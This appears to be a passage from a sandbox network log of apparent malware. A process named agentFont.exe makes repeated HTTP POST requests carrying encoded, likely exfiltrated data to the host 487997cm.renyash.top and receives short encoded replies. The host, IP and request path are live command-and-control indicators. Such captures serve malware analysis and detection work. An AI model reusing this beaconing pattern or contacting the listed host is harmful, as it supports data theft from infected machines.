                                                                                  Jan 1, 2025 11:28:03.610378027 CET326OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:28:03.955988884 CET1044OUTData Raw: 51 51 5d 5f 54 46 55 58 59 5f 5b 52 5a 59 59 52 55 51 54 5c 51 5a 5b 5b 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: QQ]_TFUXY_[RZYYRUQT\QZ[[^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW-?" =]2:B.%?\'Z)"&0<-)',"-<&X"#\.$
                                                                                  Jan 1, 2025 11:28:04.266632080 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:28:04.397981882 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:28:00 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  57192.168.2.449835185.158.202.52801136C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 1, 2025 11:28:04.627762079 CET326OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:28:04.987180948 CET1044OUTData Raw: 51 50 5d 53 51 40 55 5a 59 5f 5b 52 5a 5e 59 54 55 57 54 5e 51 5f 5b 5c 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: QP]SQ@UZY_[RZ^YTUWT^Q_[\^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW-(" .#&.&?]'95C!T'='!=(*&X"#\.8
                                                                                  Jan 1, 2025 11:28:05.273174047 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:28:05.407845974 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:28:01 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  58192.168.2.449837185.158.202.52801136C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 1, 2025 11:28:04.665839911 CET326OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1340
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:28:05.019102097 CET1340OUTData Raw: 54 56 5d 5c 54 41 50 5b 59 5f 5b 52 5a 58 59 56 55 57 54 50 51 5e 5b 5a 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: TV]\TAP[Y_[RZXYVUWTPQ^[Z^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW.+67-'&%9=$1/)3._!)T0,6)''!>:(&X"#\.
                                                                                  Jan 1, 2025 11:28:05.310483932 CET25INHTTP/1.1 100 Continue


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  59192.168.2.449843185.158.202.52801136C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 1, 2025 11:28:05.536519051 CET302OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Jan 1, 2025 11:28:05.893378019 CET1044OUTData Raw: 51 52 5d 5e 54 40 55 59 59 5f 5b 52 5a 5c 59 56 55 56 54 5d 51 5b 5b 51 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: QR]^T@UYY_[RZ\YVUVT]Q[[Q^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW-+164=2>A->/2?"3Z5C=P3Y)S=B/")<:&X"#\.0
                                                                                  Jan 1, 2025 11:28:06.210148096 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:28:06.341949940 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:28:02 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  60192.168.2.449849185.158.202.52801136C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 1, 2025 11:28:06.497102022 CET326OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:28:06.846554995 CET1044OUTData Raw: 54 50 5d 5f 54 4b 55 5e 59 5f 5b 52 5a 58 59 56 55 51 54 5f 51 51 5b 5d 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: TP]_TKU^Y_[RZXYVUQT_QQ[]^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW.(!9T7<\2@-[8%&Y%<X5*0/Q* "-%Y?:&X"#\.
                                                                                  Jan 1, 2025 11:28:07.134816885 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:28:07.266185045 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:28:03 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  61192.168.2.449855185.158.202.52801136C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 1, 2025 11:28:07.396924019 CET302OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1040
                                                                                  Expect: 100-continue
                                                                                  Jan 1, 2025 11:28:07.752861023 CET1040OUTData Raw: 54 55 58 5e 51 43 55 5b 59 5f 5b 52 5a 5a 59 57 55 57 54 59 51 50 5b 5e 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: TUX^QCU[Y_[RZZYWUWTYQP[^^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW.+"U#.<%-B9'R2<!'<&Z!9W3!S*4#[!=5\(&X"#\.
                                                                                  Jan 1, 2025 11:28:08.046703100 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:28:08.175764084 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:28:04 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  62192.168.2.449861185.158.202.52801136C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 1, 2025 11:28:08.302346945 CET326OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:28:08.658973932 CET1044OUTData Raw: 54 56 58 58 51 40 55 5a 59 5f 5b 52 5a 5d 59 54 55 57 54 5c 51 51 5b 5b 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: TVXXQ@UZY_[RZ]YTUWT\QQ[[^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW.)1=U">#%-.S&)$=!&-V3>>$,6=%]?&X"#\.
                                                                                  Jan 1, 2025 11:28:08.938919067 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:28:09.065989017 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:28:05 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  63192.168.2.449867185.158.202.52801136C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 1, 2025 11:28:09.196548939 CET326OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:28:09.549660921 CET1044OUTData Raw: 54 50 5d 5d 51 41 55 5c 59 5f 5b 52 5a 5f 59 5d 55 56 54 59 51 5e 5b 51 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: TP]]QAU\Y_[RZ_Y]UVTYQ^[Q^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW.+"U7-,Y&*E,>4&Y2X$,&65$=W);66?&X"#\.<
                                                                                  Jan 1, 2025 11:28:09.871382952 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:28:10.004017115 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:28:06 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  64192.168.2.449877185.158.202.52801136C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 1, 2025 11:28:10.134582043 CET326OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  65192.168.2.449878185.158.202.52801136C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 1, 2025 11:28:10.430921078 CET326OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1340
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:28:10.784024000 CET1340OUTData Raw: 51 56 5d 5b 51 47 50 5e 59 5f 5b 52 5a 5f 59 53 55 5f 54 58 51 5d 5b 5a 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: QV][QGP^Y_[RZ_YSU_TXQ][Z^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW.(!>"=,Y$=):+T1?=$<:Y5C%$)\"=)_<:&X"#\.<
                                                                                  Jan 1, 2025 11:28:11.078984022 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:28:11.207984924 CET308INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:28:07 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 152
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 02 1a 27 1d 3d 25 2b 5c 27 02 21 52 26 2e 23 56 3c 0a 3d 02 3b 12 25 59 25 04 27 01 2b 23 3f 54 28 38 3a 5e 2b 13 34 10 25 1c 30 55 31 25 2a 51 00 1c 23 59 2b 3b 30 03 2b 01 2e 1c 2a 57 3f 5b 29 2f 3c 02 21 39 24 08 24 5d 3a 55 33 04 37 5d 3f 06 37 0f 3b 1c 20 02 2c 0d 20 01 33 0c 2f 52 09 14 22 04 29 1d 09 50 32 22 08 10 30 56 24 04 22 16 38 0d 20 22 07 54 23 0d 3f 5d 2b 2d 1e 03 36 31 07 00 32 02 22 40 3f 2d 06 0a 21 04 23 54 2c 03 23 56 0f 36 5d 51
                                                                                  Data Ascii: '=%+\'!R&.#V<=;%Y%'+#?T(8:^+4%0U1%*Q#Y+;0+.*W?[)/<!9$$]:U37]?7; , 3/R")P2"0V$"8 "T#?]+-612"@?-!#T,#V6]Q


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  66192.168.2.449879185.158.202.52801136C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 1, 2025 11:28:10.561175108 CET326OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:28:10.909013033 CET1044OUTData Raw: 54 54 5d 53 54 41 55 5a 59 5f 5b 52 5a 5d 59 57 55 53 54 50 51 5d 5b 50 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: TT]STAUZY_[RZ]YWUSTPQ][P^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW.^(=W"-?$=*.>3R$/0,!5*'1Q)'3["?:&X"#\.
                                                                                  Jan 1, 2025 11:28:11.197736025 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:28:11.326051950 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:28:07 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  67192.168.2.449886185.158.202.52801136C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 1, 2025 11:28:11.477787971 CET302OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Jan 1, 2025 11:28:11.830944061 CET1044OUTData Raw: 51 52 5d 5c 54 46 55 5a 59 5f 5b 52 5a 58 59 5c 55 52 54 59 51 5d 5b 58 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: QR]\TFUZY_[RZXY\URTYQ][X^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW.\?1: <Y%.%:=&/:0?!!%T$<1W)43^5>!^?&X"#\.
                                                                                  Jan 1, 2025 11:28:12.123584986 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:28:12.255809069 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:28:08 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  68192.168.2.449895185.158.202.52801136C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 1, 2025 11:28:12.383811951 CET302OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Jan 1, 2025 11:28:12.737112999 CET1044OUTData Raw: 51 51 58 58 54 47 55 5d 59 5f 5b 52 5a 5e 59 52 55 50 54 50 51 58 5b 5a 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: QQXXTGU]Y_[RZ^YRUPTPQX[Z^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW.\+T94(Y2=-.&.X$*_"-3<5>'_62<:&X"#\.8
                                                                                  Jan 1, 2025 11:28:13.022958994 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:28:13.150635004 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:28:09 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  69192.168.2.449902185.158.202.52801136C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 1, 2025 11:28:13.293688059 CET302OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Jan 1, 2025 11:28:13.643456936 CET1044OUTData Raw: 54 56 58 59 54 45 50 5d 59 5f 5b 52 5a 58 59 54 55 54 54 5a 51 5e 5b 5b 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: TVXYTEP]Y_[RZXYTUTTZQ^[[^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW.)"R7<2.C9.7%9$?&Z!C>'/-*4<#>&(:&X"#\.
                                                                                  Jan 1, 2025 11:28:13.970870972 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:28:14.103729010 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:28:10 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  70192.168.2.449908185.158.202.52801136C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 1, 2025 11:28:14.225965977 CET326OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1040
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:28:14.580869913 CET1040OUTData Raw: 51 50 58 59 54 43 55 51 59 5f 5b 52 5a 5a 59 5d 55 51 54 5e 51 58 5b 5a 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
